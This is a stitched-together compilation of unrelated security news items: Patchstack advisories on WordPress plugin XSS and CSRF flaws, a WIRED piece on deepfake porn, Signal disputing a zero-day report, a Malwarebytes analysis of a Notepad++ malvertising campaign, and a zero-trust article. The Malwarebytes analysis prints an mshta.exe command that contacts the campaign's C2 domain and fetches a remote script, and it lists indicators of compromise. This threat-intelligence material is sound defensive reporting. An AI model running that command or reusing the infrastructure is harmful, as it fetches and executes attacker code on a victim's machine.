Auth. (contributo+) Stored Cross-Site Scripting (XSS) vulnerability in Cytech BuddyMeet plugin <= 2.2.0 versions.

**Solution**

 Fixed

Update the WordPress BuddyMeet plugin to the latest available version (at least 2.3.0).

Found this useful? Thank NGÔ THIÊN AN (ancorn\_ from VNPT-VCI) for reporting this vulnerability. Buy a coffee ☕

NGÔ THIÊN AN (ancorn\_ from VNPT-VCI) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress BuddyMeet Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 2.3.0.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-44985: WordPress BuddyMeet plugin <= 2.2.0 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Gopi Ramasamy Tiny Carousel Horizontal Slider plugin <= 8.1 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank yuyudhn for reporting this vulnerability. Buy a coffee ☕

yuyudhn discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Tiny Carousel Horizontal Slider Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-44229: WordPress Tiny Carousel Horizontal Slider plugin <= 8.1 - Cross Site Scripting (XSS) - Patchstack

New research shows the number of deepfake videos is skyrocketing—and the world's biggest search engines are funneling clicks to dozens of sites dedicated to the nonconsensual fakes.

Google’s and Microsoft’s search engines have a problem with deepfake porn videos. Since deepfakes emerged half a decade ago, the technology has consistently been used to abuse and harass women—using machine learning to morph someone’s head into pornography without their permission. Now the number of nonconsensual deepfake porn videos is growing at an exponential rate, fueled by the advancement of AI technologies and an expanding deepfake ecosystem.

A new analysis of nonconsensual deepfake porn videos, conducted by an independent researcher and shared with WIRED, shows how pervasive the videos have become. At least 244,625 videos have been uploaded to the top 35 websites set up either exclusively or partially to host deepfake porn videos in the past seven years, according to the researcher, who requested anonymity to avoid being targeted online.

Over the first nine months of this year, 113,000 videos were uploaded to the websites—a 54 percent increase on the 73,000 videos uploaded in all of 2022. By the end of this year, the analysis forecasts, more videos will have been produced in 2023 than the total number of every other year combined.

These startling figures are just a snapshot of how colossal the issues with nonconsensual deepfakes has become—the full scale of the problem is much larger and encompasses other types of manipulated imagery. A whole industry of deepfake abuse, which predominantly targets women and is produced without people’s consent or knowledge, has emerged in recent years. Face-swapping apps that work on still images and apps where clothes can be “stripped off a person” in a photo with just a few clicks are also highly prominent. There are likely millions of images being created with these apps.

“This is something that targets everyday people, everyday high school students, everyday adults—it's become a daily occurrence,” says Sophie Maddocks, who conducts research on digital rights and cyber-sexual violence at the University of Pennsylvania. “It would make a lot of difference if we were able to make these technologies harder to access. It shouldn't take two seconds to potentially incite a sex crime.”

The new research highlights 35 different websites, which exist to exclusively host deepfake pornography videos or incorporate the videos alongside other adult material. (It does not encompass videos posted on social media, those shared privately, or manipulated photos.) WIRED is not naming or directly linking to the websites, so as not to further increase their visibility. The researcher scraped the websites to analyze the number and duration of deepfake videos, and they looked at how people find the websites using the analytics service SimilarWeb.

Many of the websites make it clear they host or spread deepfake porn videos—often featuring the word _deepfakes_ or derivatives of it in their name. The top two websites contain 44,000 videos each, while five others host more than 10,000 deepfake videos. Most of them have several thousand videos, while some only list a few hundred. Some videos the researcher analyzed have been watched millions of times.

The research also identified an additional 300 general pornography websites that incorporate nonconsensual deepfake pornography in some way. The researcher says “leak” websites and websites that exist to repost people’s social media pictures are also incorporating deepfake images. One website dealing in photographs claims it has “undressed” people in 350,000 photos.

Measuring the full scale of deepfake videos and images online is incredibly difficult. Tracking where the content is shared on social media is challenging, while abusive content is also shared in private messaging groups or closed channels, often by people known to the victims. In September, more than 20 girls aged 11 to 17 came forward in the Spanish town of Almendralejo after AI tools were used to generate naked photos of them without their knowledge.

“There has been significant growth in the availability of AI tools for creating deepfake nonconsensual pornographic imagery, and an increase in demand for this type of content on pornography platforms and illicit online networks,” says Asher Flynn, an associate professor at Monash University, Australia, who focuses on AI and technology-facilitated abuse. This is only likely to increase with new generative AI tools.

The gateway to many of the websites and tools to create deepfake videos or images is through search. Millions of people are directed to the websites analyzed by the researcher, with 50 to 80 percent of people finding their way to the websites via search. Finding deepfake videos through search is trivial and does not require a person to have any special knowledge about what to search for.

The issue is global. Using a VPN, the researcher tested Google searches in Canada, Germany, Japan, the US, Brazil, South Africa, and Australia. In all the tests, deepfake websites were prominently displayed in search results. Celebrities, streamers, and content creators are often targeted in the videos. Maddocks says the spread of deepfakes has become “endemic” and is what many researchers first feared when the first deepfake videos rose to prominence in December 2017.

Since the tools needed to create deepfake videos emerged, they’ve become easier to use, and the quality of the videos being produced has improved. The wave of image-generation tools also offers the potential for higher-quality abusive images and, eventually, video to be created. And five years after the first deepfakes started to appear, the first laws are just emerging that criminalize the sharing of faked images.

The proliferation of these deepfake apps combined with a greater reliance on digital communications in the Covid-19 era and a "failure of laws and policies to keep pace" has created a “perfect storm,” Flynn says.

Experts say that alongside new laws, better education about the technologies is needed, as well as measures to stop the spread of tools created to cause harm. This includes action by firms that host the websites and also search engines, including Google and Microsoft’s Bing. Currently, Digital Millennium Copyright Act (DMCA) complaints are the primary legal mechanism that women have to get videos removed from websites.

Henry Ajder, a deepfake and generative AI expert who has monitored the spread of the technologies, says adding more “friction” to the process of people finding deepfake porn videos, apps to change people’s faces, and tools that specifically allow the creation of nonconsensual images can reduce the spread. “It's about trying to make it as hard as possible for someone to find,” he says. This could be search engines down-ranking results for harmful websites or internet service providers blocking sites, he says. “It's hard to feel really optimistic, given the volume and scale of these operations, and the need for platforms—which historically have not taken these issues seriously—to suddenly do so,” Ajder says.

“Like any search engine, Google indexes content that exists on the web, but we actively design our ranking systems to avoid shocking people with unexpected harmful or explicit content they don't want to see,” says Google spokesperson Ned Adriance, pointing to its page on when it removes search results. Google’s support pages say it is possible for people to request that “involuntary fake pornography” be removed. Its removal form requires people to manually submit URLs and the search terms that were used to find the content. “As this space evolves, we're actively working to add more safeguards to help protect people, based on systems we've built for other types of nonconsensual explicit imagery,” Adriance says.

Courtney Gregoire, chief digital safety officer at Microsoft, says it does not allow deepfakes, and they can be reported through its web forms. “The distribution of nonconsensual intimate imagery (NCII) is a gross violation of personal privacy and dignity with devastating effects for victims,” Gregoire says. “Microsoft prohibits NCII on our platforms and services, including the soliciting of NCII or advocating for the production or redistribution of intimate imagery without a victim’s consent.”

While the number of videos and pictures continues to skyrocket, the impact on victims can be long-lasting. “Gender-based online harassment is having an enormous chilling effect on free speech for women,” Maddocks says. As reported by WIRED, female Twitch streamers targeted by deepfakes have detailed feeling violated, being exposed to more harassment, and losing time, and some said the nonconsensual content found its way to family members.

Flynn, the Monash University professor, says her research has found “high rates” of mental health concerns—such as anxiety, depression, self-injury, and suicide—as a result of digital abuse. “The potential impacts on a person’s mental and physical health, as well as impacts on their employment, family, and social lives can be immense,” Flynn says, “regardless of whether the image is deepfaked or ‘real.’”

Deepfake Porn Is Out of Control

Encrypted messaging app Signal has pushed back against "viral reports" of an alleged zero-day flaw in its software, stating it found no evidence to support the claim.
"After responsible investigation *we have no evidence that suggests this vulnerability is real* nor has any additional info been shared via our official reporting channels," it said in a series of messages posted in X (formerly

Encrypted messaging app Signal has pushed back against "viral reports" of an alleged zero-day flaw in its software, stating it found no evidence to support the claim.

"After responsible investigation \*we have no evidence that suggests this vulnerability is real\* nor has any additional info been shared via our official reporting channels," it said in a series of messages posted in X (formerly Twitter).

Signal said it also checked with the U.S. government and that it found no information to suggest "this is a valid claim." It's also urging those with legitimate information to send reports to security@signal\[.\]org.

The development comes as reports circulated over the weekend about a zero-day exploit in Signal that could be exploited to gain complete access to a targeted mobile device.

As a security precaution, it's been advised to turn off link previews in the app. The feature can be disabled by going to Signal Settings > Chats > Generate link previews.

The disclosure also arrives as TechCrunch revealed that zero-days for infiltrating messaging apps like WhatsApp are being sold for anywhere between $1.7 and $8 million.

Zero-day flaws in iMessage, Signal, and WhatsApp are lucrative for nation-state threat actors, as they can be used as entry points to achieve remote code execution on mobile devices and stealthily surveil targets of interest by means of one-click of zero-click exploit chains.

A recent report from Amnesty International found that spyware attacks have been attempted against journalists, politicians, and academics in the European Union, the U.S., and Asia with an ultimate aim to deploy Predator, which is developed by a consortium known as the Intellexa alliance.

"Between February and June 2023, social media platforms X (formerly Twitter) and Facebook were used to publicly target at least 50 accounts belonging to 27 individuals and 23 institutions," Amnesty International said, linking it to a customer with connections to Vietnam.

Central to the spread of infections included an anonymous account on X, a now-deleted handle named @Joseph\_Gordon16, that attempted to lure targets into clicking links that would install Predator malware. The Citizen Lab is tracking the threat actor under the name REPLYSPY.

"Predator spyware infections are managed via a web-based system which Intellexa terms the 'Cyber Operation Platform,'" the international non-governmental organization said in a technical deep dive of the Predator framework.

"Spyware operators can also use this interface to initiate attack attempts against a target phone, and if successful, to retrieve and access sensitive information including photos, location data, chat messages, and microphone recordings from the infected device."

Some of the other products offered by Intellexa comprise Mars, a network injection system installed at mobile operator ISPs that silently redirects any unencrypted HTTP request from a smartphone to a Predator infection server, and Jupiter, an add-on for the Mars system that enables injection into encrypted HTTPS traffic, but only works with domestic websites hosted by a local ISP.

A recent report from Haaretz also detailed how commercial surveillance vendors are looking to weaponize the digital advertising ecosystem to target and infect mobile devices globally using ad networks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Signal Debunks Zero-Day Vulnerability Reports, Finds No Evidence

Cross-Site Request Forgery (CSRF) vulnerability in SendPulse SendPulse Free Web Push plugin <= 1.3.1 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress SendPulse Free Web Push Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-45274: WordPress SendPulse Free Web Push plugin <= 1.3.1 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Galaxy Weblinks Video Playlist For YouTube plugin <= 6.0 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Video Playlist For YouTube Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-45653: WordPress Video Playlist For YouTube plugin <= 6.0 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

The File Manager Pro WordPress plugin before 1.8 does not properly check the CSRF nonce in the `fs_connector` AJAX action. This allows attackers to make highly privileged users perform unwanted file system actions via CSRF attacks by using GET requests, such as uploading a web shell.

CVE-2023-4827

Cross-Site Request Forgery (CSRF) vulnerability in Kevin Weber Lazy Load for Videos plugin <= 2.18.2 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Lazy Load for Videos Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-45656: WordPress Lazy Load for Videos plugin <= 2.18.2 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Categories: Threat Intelligence
Tags: malvertising

Tags: ads

Tags: notepad

Tags: hta

Tags: malware

Tags: google

A sophisticated threat actor has been using Google ads to deliver custom malware payloads to victims for months while flying under the radar.



(Read more...)




The post The forgotten malvertising campaign appeared first on Malwarebytes Labs.

In recent weeks, we have noted an increase in malvertising campaigns via Google searches. Several of the threat actors we are tracking have improved their techniques to evade detection throughout the delivery chain.

We believe this evolution will have a real world impact among corporate users getting compromised via malicious ads eventually leading to the deployment of malware and ransomware.

In this blog post, we look at a malvertising campaign that seems to have flown under the radar entirely for at least several months. It is unique in its way to fingerprint users and distribute time sensitive payloads.

**Malicious ads for Notepad++**

The threat actor is running a campaign targeting Notepad++, a popular text editor for Windows as well as similar software programs such as PDF converters. The image below is a collage of malicious ads we observed recently, all run by the same threat actor but via different ad accounts, likely compromised.

A first level of filtering happens when the user clicks on one of these ads. This is likely an IP check that discards VPNs and other non genuine IP addresses and instead shows a decoy site:

However, intended targets will see a replica of the real Notepad++ website hosted at notepadxtreme\[.\]com:

**Fingerprinting for VM detection**

A second level of filtering happens when the user clicks on the download link where JavaScript code performs a system fingerprint. We had previously observed some malvertising campaigns check for the presence of emulators or virtual machines and this is what happens here also, although the code being used is different and more complex.

If any of the checks don't match, the user is being redirected to the legitimate Notepad++ website. Each potential victim is assigned a unique ID that will allow them to download the payload.

**Custom, time-sensitive download**

Another thing that sets apart this campaign from others is the way the payload is being downloaded. Each user is given a unique ID with the following format:

CukS1=\[10 character string\]\[13 digits\]

This is likely for tracking purposes but also to make each download unique and time sensitive.

Unlike other malvertising campaigns the payload is a _.hta_ script. It follows the same naming convention seen above with the download URL:

Notepad\_Ver\_\[10 character string\]\[13 digits\].hta

Attempting to download the file again from the same URL results in an error:

**.HTA Payload**

The .hta file we captured during our investigation was not fully weaponized. However, we were able to find another one that was uploaded to VirusTotal in early July. It uses the same naming convention and we can see the lure was "PDF Converter" instead of Notepad++.

The script is well obfuscated and shows 0 detection on VirusTotal. However, upon dynamic analysis, there is a connection to a remote domain (mybigeye\[.\]icu) on a custom port:

C:\\Windows\\SysWOW64\\mshta.exe "C:\\Windows\\System32\\mshta.exe"   
https://mybigeye .icu:52054/LXGZlAJgmvCaQfer/rWABCTDEqFVGdHIQ.html?client\_id=jurmvozdcf1687983013426#he7HAp1X4cgqv5SJykr3lRtaxijL0WPB6sdGnZC9IouwDKf8OEMQTFNbmYzU2V+/=

We also notice it uses the same client\_id stored in the filename when making that remote connection.

While we don't know what happens next, we believe this is part of malicious infrastructure used by threat actors to gain access to victims' machines using tools such as Cobalt Strike.

**Innovation makes malvertising a greater threat**

We have observed an increase in the volume of malvertising campaigns but also in their sophistication over the past several months. Threat actors are successfully applying evasion techniques that bypass ad verification checks and allow them to target certain types of victims.

With a reliable malware delivery chain in hand, malicious actors can focus on improving their decoy pages and craft custom malware payloads. This is another space where we see some innovation and where security vendors are currently running behind.

Threat intelligence is a critical part of a defensive strategy to better understand the threat landscape in order to protect users. For example, tracking malicious ads allows us to quickly identify the infrastructure used by threat actors and immediately block it. Following the malware delivery chain shows us any new techniques that may bypass current security products and helps us to adjust our detections accordingly.

**Indicators of Compromise**

Ad domains:

switcodes\[.\]com  
karelisweb\[.\]com  
jquerywins\[.\]com  
mojenyc\[.\]com

Fake Notepad++ site:

notepadxtreme\[.\]com

Script C2:

mybigeye\[.\]icu

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The forgotten malvertising campaign

The security principle of zero trust is the cornerstone of robust cloud security.

In an era where data breaches and cyberattacks continue to dominate headlines, the importance of robust security measures has never been more evident. As organizations increasingly migrate their data and operations to the cloud, a paradigm shift in security strategy is essential. Enter zero trust, a security concept that has emerged as the cornerstone of cloud security. This article will explore why zero trust is crucial for safeguarding cloud environments.

**The Cloud Security Challenge**

Adopting cloud computing has brought unprecedented flexibility, scalability, and cost efficiency for businesses; however, migration to the cloud has also opened new avenues for cyber threats. The traditional security perimeter model — protecting the network perimeter — must change. Security must adapt to the challenges of this dynamic landscape with data residing in remote data centers and users accessing resources from anywhere.

**What Is Zero Trust?**

Zero trust is not just a technology but a holistic security approach that fundamentally shifts the security paradigm. The core tenet of zero trust is simple: "Never trust, always verify." In essence, zero trust means security teams should not inherently trust anyone or anything, regardless of whether they are inside or outside the network.

The fundamental principles of zero trust include:

1.  **Continuous verification:** Every access request is verified, regardless of the user's location or device. This principle includes strong multifactor authentication (MFA) and device health checks.
2.  **Least privilege access:** Security teams grant users and systems only the minimum access required to perform their tasks, reducing the attack surface and potential damage in case of a breach.
3.  **Micro-segmentation:** Networks are divided into small, isolated segments with access controls enforced between them, preventing lateral movement by attackers.
4.  **Data-centric security:** Zero trust prioritizes data protection, ensuring data is encrypted, classified, and rigorously access-controlled.

**Why Zero Trust for Cloud Security?**

Reasons zero trust is important for securing cloud environments include:

1.  **Perimeterless environments:** Cloud environments are inherently perimeterless. Traditional security models that rely on securing the network perimeter are ineffective when data and applications are dispersed across multiple cloud providers and accessed from anywhere. Zero trust, which focuses on continuous verification, addresses this challenge by securing access at the individual request level.
2.  **Evolving threat landscape:** Cyber threats are constantly evolving, becoming more sophisticated and persistent. Zero trust's continuous monitoring and verification principle helps organizations stay one step ahead of these threats by detecting and responding to anomalies and breaches in real time.
3.  **Remote workforce:** The rise of remote work has blurred the lines between corporate networks and the public Internet. With employees accessing cloud resources from various locations and devices, zero trust ensures access is granted based on user identity and device trustworthiness, not just network location.
4.  **Data protection:** In cloud environments, data is the crown jewel. Zero trust places data protection at its core, ensuring that even if a breach occurs, sensitive data remains encrypted and inaccessible to unauthorized parties.
5.  **Compliance and regulations:** Many industries are subject to strict data protection regulations. Zero trust helps organizations meet these compliance requirements by enforcing stringent access controls, monitoring activities, and maintaining an audit trail.

**Implementing Zero Trust in Cloud Environments**

To implement zero trust in cloud security, organizations should consider:

1.  **Identity and access management (IAM):** Implement strong authentication methods and access controls based on user identity.
2.  **Continuous monitoring:** Utilize threat detection and response tools to monitor activities and identify anomalies.
3.  **Least privilege access:** Grant minimal access permissions to users and systems based on their roles and responsibilities.
4.  **Data encryption:** Encrypt data at rest and in transit and classify data based on sensitivity.
5.  **Micro-segmentation:** Implement network segmentation to control lateral movement within cloud environments.

**Zero Trust Is Not Optional**

As organizations continue their digital transformation journey by embracing cloud technologies, zero trust emerges as the bedrock of cloud security. The principles of continuous verification, least privilege access, and data-centric security align perfectly with cloud environments' dynamic and distributed nature. Embracing zero trust is not merely an option; it's necessary to protect sensitive data, mitigate risks, and ensure the security of cloud-based operations in an ever-evolving threat landscape. Zero trust isn't just a buzzword; it's the future of cloud security. To learn more about zero trust, AI, and other topics in the ever-evolving threat landscape, log into the #AskCyderes webcast.

**About the Author**

    

Patrick Carter has 15 years of industry experience across security architecture, cloud security, security program management, and strategic consulting. He has a strong understanding of multicloud security architecture, working with both commercial and enterprise-level clients in Azure, AWS, and GCP. He has extensive experience in practice development and service optimization utilizing multiple disciplines. Having consulted enterprises of multiple industries, Patrick is passionate about developing cloud security programs that meet clients' specific needs and building strong relationships that enable them to secure their cloud journey.

Tag

#web